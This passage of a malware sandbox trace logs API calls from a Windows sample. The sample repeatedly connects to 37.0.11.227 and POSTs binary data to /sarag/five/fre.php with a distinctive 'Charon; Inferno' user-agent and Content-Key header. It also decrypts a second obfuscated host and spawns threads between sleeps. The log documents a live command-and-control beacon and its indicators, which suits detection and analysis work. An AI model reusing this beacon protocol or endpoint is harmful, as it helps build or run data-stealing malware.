(HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0261.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.316] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0261.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.317] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0261.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.318] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0261.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.320] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0261.320] GetProcessHeap () returned 0x690000 [0261.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0261.320] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0261.320] GetProcessHeap () returned 0x690000 [0261.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0261.320] socket (af=2, type=1, protocol=6) returned 0x794 [0261.324] connect (s=0x794, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0261.364] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0261.364] GetProcessHeap () returned 0x690000 [0261.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0261.364] GetProcessHeap () returned 0x690000 [0261.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0261.365] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0261.366] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0261.366] GetProcessHeap () returned 0x690000 [0261.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0261.366] GetProcessHeap () returned 0x690000 [0261.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0261.367] GetProcessHeap () returned 0x690000 [0261.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0261.367] GetProcessHeap () returned 0x690000 [0261.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0261.368] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0261.372] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0261.372] GetProcessHeap () returned 0x690000 [0261.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0261.373] GetProcessHeap () returned 0x690000 [0261.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0261.373] send (s=0x794, buf=0x6ad508*, len=242, flags=0) returned 242 [0261.374] send (s=0x794, buf=0x6aba40*, len=159, flags=0) returned 159 [0261.374] GetProcessHeap () returned 0x690000 [0261.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0261.374] recv (in: s=0x794, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0261.450] GetProcessHeap () returned 0x690000 [0261.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0261.451] GetProcessHeap () returned 0x690000 [0261.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0261.461] GetProcessHeap () returned 0x690000 [0261.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0261.465] GetProcessHeap () returned 0x690000 [0261.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0261.466] closesocket (s=0x794) returned 0 [0261.467] GetProcessHeap () returned 0x690000 [0261.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0261.467] GetProcessHeap () returned 0x690000 [0261.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0261.467] GetProcessHeap () returned 0x690000 [0261.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0261.468] GetProcessHeap () returned 0x690000 [0261.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0261.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1544) returned 0x794 [0261.471] Sleep (dwMilliseconds=0xea60) [0261.473] GetProcessHeap () returned 0x690000 [0261.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0261.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.475] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.570] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0261.596] GetProcessHeap () returned 0x690000 [0261.596] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0261.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.648] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0261.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.875] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.876] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.876] GetProcessHeap () returned 0x690000 [0261.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0261.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.890] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0261.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.915] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0262.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.034] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0262.034] GetProcessHeap () returned 0x690000 [0262.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0262.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.036] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.037] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.043] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.045] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.045] GetProcessHeap () returned 0x690000 [0262.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0262.045] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0262.046] GetProcessHeap () returned 0x690000 [0262.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0262.047] GetProcessHeap () returned 0x690000 [0262.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0262.047] GetProcessHeap () returned 0x690000 [0262.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0262.048] GetProcessHeap () returned 0x690000 [0262.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0262.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0262.078] GetProcessHeap () returned 0x690000 [0262.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0262.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.079] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0262.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.081] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.082] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.082] GetProcessHeap () returned 0x690000 [0262.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0262.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.105] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0262.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.106] CryptDestroyKey (hKey=0x69d028) returned 1 [0262.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.107] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0262.107] GetProcessHeap () returned 0x690000 [0262.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0262.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.108] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0262.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.109] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0262.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.110] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0262.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.111] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0262.111] GetProcessHeap () returned 0x690000 [0262.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0262.111] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0262.112] GetProcessHeap () returned 0x690000 [0262.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0262.112] socket (af=2, type=1, protocol=6) returned 0x798 [0262.112] connect (s=0x798, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0262.136] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0262.136] GetProcessHeap () returned 0x690000 [0262.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0262.137] GetProcessHeap () returned 0x690000 [0262.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0262.137] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0262.138] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0262.139] GetProcessHeap () returned 0x690000 [0262.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0262.139] GetProcessHeap () returned 0x690000 [0262.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0262.139] GetProcessHeap () returned 0x690000 [0262.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0262.139] GetProcessHeap () returned 0x690000 [0262.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0262.140] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0262.141] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0262.141] GetProcessHeap () returned 0x690000 [0262.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0262.141] GetProcessHeap () returned 0x690000 [0262.142] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0262.142] send (s=0x798, buf=0x6ad508*, len=242, flags=0) returned 242 [0262.142] send (s=0x798, buf=0x6aba40*, len=159, flags=0) returned 159 [0262.143] GetProcessHeap () returned 0x690000 [0262.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0262.143] recv (in: s=0x798, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0262.276] GetProcessHeap () returned 0x690000 [0262.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0262.283] GetProcessHeap () returned 0x690000 [0262.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0262.288] GetProcessHeap () returned 0x690000 [0262.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0262.292] GetProcessHeap () returned 0x690000 [0262.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0262.295] closesocket (s=0x798) returned 0 [0262.295] GetProcessHeap () returned 0x690000 [0262.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0262.295] GetProcessHeap () returned 0x690000 [0262.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0262.299] GetProcessHeap () returned 0x690000 [0262.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0262.300] GetProcessHeap () returned 0x690000 [0262.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0262.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1548) returned 0x798 [0262.307] Sleep (dwMilliseconds=0xea60) [0262.309] GetProcessHeap () returned 0x690000 [0262.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0262.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.328] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0262.340] GetProcessHeap () returned 0x690000 [0262.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0262.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.341] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0262.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.343] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.359] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.359] GetProcessHeap () returned 0x690000 [0262.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0262.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.365] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0262.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.368] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0262.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.396] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0262.396] GetProcessHeap () returned 0x690000 [0262.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0262.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.397] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.399] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.400] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.401] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.401] GetProcessHeap () returned 0x690000 [0262.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0262.401] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0262.401] GetProcessHeap () returned 0x690000 [0262.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0262.404] GetProcessHeap () returned 0x690000 [0262.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0262.404] GetProcessHeap () returned 0x690000 [0262.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0262.405] GetProcessHeap () returned 0x690000 [0262.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0262.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.406] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0262.467] GetProcessHeap () returned 0x690000 [0262.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0262.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.469] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0262.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.471] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.473] GetProcessHeap () returned 0x690000 [0262.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0262.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.529] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0262.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.531] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0262.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0262.534] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0262.534] GetProcessHeap () returned 0x690000 [0262.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0262.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.570] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0262.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.581] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0262.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.590] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0262.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.593] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0262.593] GetProcessHeap () returned 0x690000 [0262.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0262.593] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), 